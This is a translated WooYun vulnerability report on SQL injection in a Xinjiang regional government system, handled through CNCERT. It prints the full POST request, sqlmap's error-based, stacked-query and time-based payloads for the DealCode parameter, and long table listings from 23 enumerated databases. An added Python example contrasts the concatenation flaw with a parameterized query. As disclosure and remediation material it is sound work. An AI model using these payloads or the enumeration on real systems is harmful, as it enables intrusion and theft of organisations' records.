
Vulnerability summary

Defect ID: wooyun-2015-0158648

Title: MSSQL injection in a system of the Xinjiang Uyghur Autonomous Region (23 databases affected)

Related vendor: CNCERT (National Internet Emergency Center)

Author: 无名人

Submitted: 2015-12-07 14:10

Fixed: 2016-01-23 15:16

Published: 2016-01-23 15:16

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 11

Status: handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-12-07: Details sent to the vendor, awaiting vendor handling
2015-12-10: Vendor confirmed; details disclosed to the vendor only
2015-12-20: Details disclosed to core white hats and relevant domain experts
2015-12-30: Details disclosed to ordinary white hats
2016-01-09: Details disclosed to intern white hats
2016-01-23: Details disclosed to the public

Brief description:

RT (as in the title)

Detailed description:

Vulnerable URL:

POST /dm/printview_X.asp HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Content-Length: 35
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://**.**.**.**
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://**.**.**.**/dm/deal_X.asp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCSTAQCCT=KCEKKDABHPDIFKJIPOABOJAE
DealCode=121213*&Submit=%CC%E1%BD%BB


The DealCode parameter is injectable by several techniques

---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
---
[22:13:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000

Proof of vulnerability:

数据库.png (screenshot: database list)


Database: tempdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.sysconstraints | 4 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: webcodecheck
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.t_jgdm_cysh | 307878 |
| dbo.SM_USERLOGIN_LOG | 4342 |
| dbo.tjlog_save | 3171 |
| dbo.t_njjhy | 1199 |
| dbo.t_pzjg | 1052 |
| dbo.t_jjhy | 1047 |
| dbo.t_gj | 474 |
| dbo.t_xzqh | 236 |
| dbo.SM_SYSOPER_LOG | 120 |
| dbo.t_bzjgdm | 109 |
| dbo.t_wtlx | 107 |
| dbo.SM_USERRIGHTKEY | 88 |
| dbo.t_hb | 72 |
| dbo.t_njjlx | 34 |
| dbo.t_jjlx | 30 |
| dbo.SM_CONFIG | 29 |
| dbo.t_njglx | 26 |
| dbo.SM_RIGHTKEY | 18 |
| dbo.t_jglx | 12 |
| dbo.SM_UGROLEDETAIL | 9 |
| dbo.sysconstraints | 7 |
| dbo.SM_BRANCH | 5 |
| dbo.SM_ROLE | 5 |
| dbo.SM_USERGROUP | 5 |
| dbo.SM_USERMANAGE | 5 |
| dbo.syssegments | 3 |
| dbo.SM_USER | 1 |
| dbo.v_rand | 1 |
+--------------------------------------+---------+
Database: CodeNianJian
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.Deal | 1343392 |
| dbo.t_jgdm | 405154 |
| dbo.t_jgdm_tm | 298583 |
| dbo.t_jgdm_xb | 157809 |
| dbo.t_jgdm_ws3 | 9881 |
| codenianjian.t_jgdm_backws | 4663 |
| dbo.t_xzqh1 | 3259 |
| dbo.t_njjhy | 1199 |
| dbo.t_jjhy | 1047 |
| dbo.t_pzjg | 978 |
| dbo.t_xzqh | 117 |
| dbo.t_hb | 36 |
| dbo.t_njjlx | 34 |
| dbo.t_jjlx | 30 |
| dbo.sysconstraints | 22 |
| dbo.t_zjlx | 13 |
| dbo.t_jglx | 12 |
| dbo.syssegments | 3 |
| dbo.ManageUser | 2 |
+--------------------------------------+---------+
Database: msdb
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.backupfile | 66516 |
| dbo.backupset | 34961 |
| dbo.backupmediafamily | 34896 |
| dbo.backupmediaset | 34895 |
| dbo.restorefile | 97 |
| dbo.sysconstraints | 93 |
| dbo.restorehistory | 78 |
| dbo.restorefilegroup | 19 |
| dbo.syscategories | 19 |
| dbo.syssegments | 3 |
+--------------------------------------+---------+
Database: codechk
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.CodeOper | 154108 |
| dbo.Sys_EntryLog | 58650 |
| dbo.VIEW1 | 2888 |
| dbo.t_njjhy | 1199 |
| dbo.Sys_UserRole | 162 |
| dbo.Sys_user | 112 |
| dbo.Sys_RoleRight | 89 |
| dbo.t_hb | 36 |
| dbo.Sys_Module | 28 |
| dbo.sysconstraints | 13 |
| dbo.Sys_Role | 6 |
| dbo.syssegments | 3 |
| dbo.Sys_Dept | 1 |
| dbo.Sys_Unit | 1 |
+--------------------------------------+---------+
Database: master
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| INFORMATION_SCHEMA.PARAMETERS | 2299 |
| dbo.spt_values | 730 |
| INFORMATION_SCHEMA.ROUTINES | 654 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 379 |
| INFORMATION_SCHEMA.COLUMNS | 379 |
| INFORMATION_SCHEMA.VIEW_COLUMN_USAGE | 295 |
| INFORMATION_SCHEMA.VIEW_TABLE_USAGE | 62 |
| dbo.spt_datatype_info | 36 |
| INFORMATION_SCHEMA.TABLES | 34 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 33 |
| dbo.spt_server_info | 29 |
| dbo.spt_provider_types | 25 |
| INFORMATION_SCHEMA.VIEWS | 25 |
| INFORMATION_SCHEMA.SCHEMATA | 24 |
| INFORMATION_SCHEMA.ROUTINE_COLUMNS | 17 |
| dbo.spt_datatype_info_ext | 10 |
| dbo.syssegments | 3 |
| dbo.spt_monitor | 1 |
| dbo.sysconstraints | 1 |
+--------------------------------------+---------+
Database: webcode
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| dbo.t_czjl_bak | 4282282 |
| dbo.t_czjl | 4245720 |
| dbo.t_lsls | 3529448 |
| dbo.t_zysh | 2325489 |
| dbo.t_zs | 1890425 |
| dbo.t_bgk_ls | 1842586 |
| dbo.t_hz_week | 1549480 |
| dbo.t_zsbhb | 1389852 |
| dbo.t_hz_day | 590643 |
| dbo.v_codecheckview | 365669 |
| dbo.t_hz_month | 363560 |
| dbo.t_cdsj | 362946 |
| dbo.tk_fzk | 345475 |
| dbo.tk_kxxk | 343016 |
| dbo.t_jgdm_bak | 337073 |
| dbo.t_jgdm_ls | 336992 |
| dbo.v_fkbz | 334165 |
| dbo.t_jgdm | 332534 |
| dbo.v_jgdm_all | 332534 |
| dbo.t_fzdm | 242270 |
| dbo.v_zhika | 191656 |
| dbo.v_writecard | 191390 |
| dbo.v_jgdm | 138733 |
| dbo.v_card | 117891 |
| dbo.t_sp | 110291 |
| dbo.t_black | 108832 |
| dbo.t_hteventlog | 89703 |
| dbo.tk_fkk | 75604 |
| dbo.tk_xgk | 73007 |
| dbo.t_email | 45976 |
| dbo.t_downloadlog | 10886 |
| dbo.t_qzjgdm | 8024 |
| dbo.txzqhmodule | 7749 |
| dbo.t_qtmdsource | 5453 |
| dbo.t_xzqh1 | 4195 |
| dbo.t_printset | 3311 |
| dbo.t_zsbhsource | 2634 |
| dbo.t_jglx_pzjg | 2534 |
| dbo.t_xzqh_bsx | 2430 |
| dbo.t_mdk | 2035 |
| dbo.t_zycp | 1462 |
| dbo.codebuf | 1412 |
| dbo.t_zsds | 1386 |
| dbo.v_jgdm_new | 1303 |
| dbo.t_njjhy | 1199 |
| dbo.t_jjhy | 1047 |
| dbo.t_pzjg | 1027 |
| dbo.trolemodule | 664 |
| dbo.c_s0101 | 652 |
| dbo.tuserinfo | 452 |
| dbo.tusermodule | 394 |
| dbo.tmodule | 306 |
| dbo.t_zssl | 294 |
| dbo.t_gj | 237 |
| dbo.sysconstraints | 215 |
| dbo.t_jgdm_save | 210 |
| dbo.t_mdsource | 140 |
| dbo.t_djgdm | 134 |
| dbo.c_s03 | 122 |
| dbo.t_xzqh | 119 |
| dbo.t_mdktemp | 116 |
| dbo.c_s01 | 115 |
| dbo.s_serial | 104 |
| dbo.t_zrxzqh | 98 |
| dbo.t_zszjze | 85 |
| dbo.v_bzjg | 84 |
| dbo.V_XZQH | 84 |
| dbo.ttable | 57 |
| dbo.trole | 44 |
| dbo.t_gscssz | 40 |
| dbo.t_operate_type | 40 |
| dbo.t_hb | 36 |
| dbo.t_njjlx | 34 |
| dbo.t_ljdm | 32 |
| dbo.tk_printset | 31 |
| dbo.t_jjlx | 30 |
| dbo.t_qtmdk | 26 |
| dbo.pbcatedt | 21 |
| dbo.pbcatfmt | 20 |
| dbo.tcss | 20 |
| dbo.t_jgdmpgsz | 16 |
| dbo.c_s02 | 15 |
| dbo.t_zjlx | 13 |
| dbo.t_cxkey | 12 |
| dbo.t_jglx | 12 |
| dbo.t_sclasttime | 9 |
| dbo.t_jglx_bsx | 8 |
| dbo.t_cflx | 7 |
| dbo.t_sppz | 6 |
| dbo.t_spdmtemp | 5 |
| dbo.syssegments | 3 |
| dbo.treport | 3 |
| dbo.t_gg | 2 |
| dbo.t_bajlb | 1 |
| dbo.t_htxtsz | 1 |
| dbo.t_lyb | 1 |
| dbo.t_pglasttime | 1 |
| dbo.t_system | 1 |
| dbo.t_zgjg | 1 |
| dbo.t_zsdj | 1 |
| dbo.tsysinfo | 1 |
+--------------------------------------+---------+
Database: thams
+--------------------------------------+---------+
| Table | Entries |
+--------------------------------------+---------+
| thams.P_FILE0 | 6653069 |
| thams.RECIVELOG | 1825664 |
| thams.E_FILE0 | 1728617 |
| thams.D_FILE0 | 1728208 |
| thams.TRANSFILELOG | 1318174 |
| thams.S_LOGIN | 594890 |
| dbo.VIEW3 | 525769 |
| dbo.text | 12874 |
| dbo.tst | 10486 |
| dbo.t_xwqy_04 | 9110 |
| dbo.t_gjzx_04 | 7488 |
| dbo.VIEW2 | 4781 |
| dbo.t_xwqy_01 | 3511 |
| dbo.t_jgdm20140811 | 1196 |
| thams.FLAGLOG | 258 |
| dbo.sysconstraints | 137 |
| thams.FTPUSER | 99 |
| thams.S_ALL | 65 |
| dbo.VIEW602 | 56 |
| dbo.xinjiang | 56 |
| thams.F_D_FILE0 | 50 |
| thams.F_X_D_FILE0 | 49 |
| thams.F_W_QT2 | 44 |
| thams.F_W_QT1 | 40 |
| thams.F_S_BORROW | 24 |
| thams.F_S_TMPRIGHT | 24 |
| thams.F_E_FILE0 | 22 |
| thams.F_E_FILEQT1 | 22 |
| thams.F_E_FILEQT2 | 22 |
| thams.F_S_DESTORY | 19 |
| thams.F_S_USER | 18 |
| thams.F_S_DALX | 16 |
| thams.F_S_REPORT | 16 |
| thams.F_S_LOG | 13 |
| thams.S_XTGN | 13 |
| thams.F_S_HSZ | 12 |
| thams.F_FLAGLOG | 11 |
| thams.F_S_FWQPZ | 11 |
| thams.F_S_MLS | 10 |
| thams.F_S_GL | 9 |
| thams.F_S_GZOPER | 9 |
| thams.F_S_DAOPER | 8 |
| thams.F_S_LOGIN | 8 |
| thams.F_Z_ZHKGL | 8 |
| thams.F_FTPUSER | 7 |
| thams.F_RECIVELOG | 7 |
| thams.F_S_DAWJKZDDY | 7 |
| thams.F_S_MROPER | 7 |
| thams.F_S_XHLC | 7 |
| thams.F_S_GROUP | 6 |
| thams.F_S_ROLERIGHT | 6 |
| thams.F_S_TBLCODE | 6 |
| thams.F_S_ZDDYFZB | 6 |
| thams.F_TRANSFILELOG | 6 |
| thams.F_Z_WSDGL | 6 |
| thams.F_D_CLASSIFY0 | 5 |
| thams.F_D_DHGZ0 | 5 |
| thams.F_S_MLNODE | 5 |
| thams.F_S_QZH | 5 |
| thams.F_S_XTGN | 5 |
| thams.F_S_XTPXZD | 5 |
| thams.F_S_ZTKML | 5 |
| thams.F_W_WJKGL | 5 |
| thams.F_Z_WSDFW | 5 |
| thams.CODECONV | 4 |
| thams.F_D_PATHCONFIG0 | 4 |
| thams.F_D_PXZD0 | 4 |
| thams.F_P_BGQX | 4 |
| thams.F_S_LJF | 4 |
| thams.F_S_NB | 4 |
| thams.F_S_PATHCONFIG | 4 |
| thams.F_S_ROLE | 4 |
| thams.F_S_TB | 4 |
| thams.F_S_USERROLE | 4 |
| thams.F_S_VFM | 4 |
| thams.F_S_WYFBZD | 4 |
| thams.F_W_PATHCONFIG | 4 |
| thams.P_MJ | 4 |
| dbo.syssegments | 3 |
| thams.F_D_FZZD0 | 3 |
| thams.F_D_WBX0 | 3 |
| thams.F_P_MJ | 3 |
| thams.F_S_NBTREE | 3 |
| thams.F_S_TJPROJECT | 3 |
| thams.F_SYSGK | 3 |
| thams.P_BGQX | 3 |
| thams.S_USER | 3 |
| thams.F_P_ZTC | 2 |
| thams.F_S_SHJZHHDY | 2 |
| thams.F_S_YUCODE | 2 |
| thams.S_ROLE | 2 |
| thams.SYSGK | 2 |
| thams.W_WJKGL | 2 |
| thams.ConverTB | 1 |
| thams.D_WBX0 | 1 |
| thams.PAGETABLE | 1 |
| thams.S_DALX | 1 |
| thams.S_FWQPZ | 1 |
| thams.S_MLS | 1 |
| thams.S_QZH | 1 |
+--------------------------------------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: DealCode=121213' AND 6034=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (6034=6034) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'zhKC'='zhKC&Submit=%CC%E1%BD%BB
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: DealCode=121213';WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind (comment)
Payload: DealCode=121213' WAITFOR DELAY '0:0:5'--&Submit=%CC%E1%BD%BB
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
Database: CodeNianJian
Table: Deal
[11 columns]
+-------------+----------+
| Column | Type |
+-------------+----------+
| ApplyTime | datetime |
| AuditTime | datetime |
| DealCode | varchar |
| DealDoc | varchar |
| DealStatus | int |
| Decision | int |
| ID | int |
| jgdm | varchar |
| UserName | varchar |
| UserSection | varchar |
| Zt | varchar |
+-------------+----------+


Contains 110,000 (11W) enterprise records

企业信息.png (screenshot: enterprise records)


Dumped two records at random as proof:

1.png

Fix recommendation:

@@
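The fix section of the report is left empty. What follows is an added example, not code from the report or from the affected system: it models the DealCode lookup in SQLite (standing in for SQL Server 2000, since the parameter-binding principle is the same), reconstructs the string-concatenation pattern that a classic ASP page of this kind typically uses (an assumption; the page's source is not in the report), shows how the stacked-query payload sqlmap reported turns one SELECT into two statements, and sets the parameterized query beside it. The table and column names follow CodeNianJian.Deal as listed in the report; the rows, the helper names (`build_query_unsafe`, `split_statements`, `lookup_deal_safe`, `is_valid_deal_code`) and the numeric DealCode allowlist are constructed assumptions.

```python
import re
import sqlite3

# Constructed sample table, modelled on a subset of the CodeNianJian.Deal columns
# listed in the report. SQLite stands in for SQL Server 2000 so the example runs
# offline; binding parameters works the same way on both.
SCHEMA = """
CREATE TABLE Deal (
    ID         INTEGER PRIMARY KEY,
    DealCode   TEXT NOT NULL,
    DealStatus INTEGER,
    UserName   TEXT
);
"""
# Constructed rows, not data from the report.
SAMPLE_ROWS = [
    (1, "121213", 1, "operator_a"),
    (2, "121214", 0, "operator_b"),
]

# The stacked-query payload exactly as sqlmap reported it for the DealCode field.
STACKED_PAYLOAD = "121213';WAITFOR DELAY '0:0:5'--"

# Assumption: a legitimate DealCode is a short string of digits, like the sample
# value 121213 in the report. The real format is not stated on the page.
DEAL_CODE_RE = re.compile(r"^[0-9]{1,20}$")


def open_sample_db():
    """Create an in-memory SQLite database holding the constructed Deal rows."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO Deal VALUES (?, ?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_query_unsafe(deal_code):
    """Hypothetical reconstruction of the vulnerable pattern: the DealCode form
    field is pasted into the SQL text, so a quote in the input closes the literal
    and everything after it is parsed as SQL. Returned as text only; never run."""
    return ("SELECT ID, DealCode, DealStatus, UserName FROM Deal "
            "WHERE DealCode = '" + deal_code + "'")


def split_statements(sql):
    """Split SQL text into statements the way a T-SQL parser sees them: ';' is a
    separator only outside single-quoted strings ('' is an escaped quote) and
    outside '--' line comments, whose text is dropped."""
    statements, current = [], []
    i, n = 0, len(sql)
    in_string = False
    while i < n:
        ch = sql[i]
        if in_string:
            current.append(ch)
            if ch == "'":
                if i + 1 < n and sql[i + 1] == "'":   # escaped quote inside string
                    current.append("'")
                    i += 1
                else:
                    in_string = False
        elif ch == "'":
            in_string = True
            current.append(ch)
        elif sql.startswith("--", i):                 # comment runs to end of line
            while i < n and sql[i] != "\n":
                i += 1
            continue
        elif ch == ";":
            statements.append("".join(current).strip())
            current = []
        else:
            current.append(ch)
        i += 1
    statements.append("".join(current).strip())
    return [s for s in statements if s]


def is_valid_deal_code(deal_code):
    """Allowlist check (defence in depth, not the primary control)."""
    return DEAL_CODE_RE.match(deal_code) is not None


def lookup_deal_safe(conn, deal_code):
    """Hardened form: the value is bound as a parameter, so the DBMS receives it
    as data and a quote inside it can never terminate the literal."""
    cur = conn.execute(
        "SELECT ID, DealCode, DealStatus, UserName FROM Deal WHERE DealCode = ?",
        (deal_code,),
    )
    return cur.fetchall()


if __name__ == "__main__":
    print(split_statements(build_query_unsafe(STACKED_PAYLOAD)))
    db = open_sample_db()
    print(lookup_deal_safe(db, "121213"))
    print(lookup_deal_safe(db, STACKED_PAYLOAD))
```

With the stacked payload, `build_query_unsafe` yields text that `split_statements` sees as two statements, the second being `WAITFOR DELAY '0:0:5'`, which is the five-second delay sqlmap used to confirm the injection; the parameterized `lookup_deal_safe` compares the whole payload as a literal DealCode and simply returns no rows. Note that the report's time-based payload (`121213' WAITFOR DELAY '0:0:5'--`) contains no semicolon at all and SQL Server still executes it, so counting statements is an illustration of why the payload works, not a filter to rely on: binding the value as a parameter is the fix, and the digits-only allowlist only narrows what reaches the query.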

Copyright notice: please credit the source when reposting: 无名人@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-12-10 17:58

Vendor reply:

CNVD has confirmed and reproduced the described issue; it has been forwarded via CNCERT to the Xinjiang branch center, which will coordinate handling with the organisation that operates the site.

Latest status:

None yet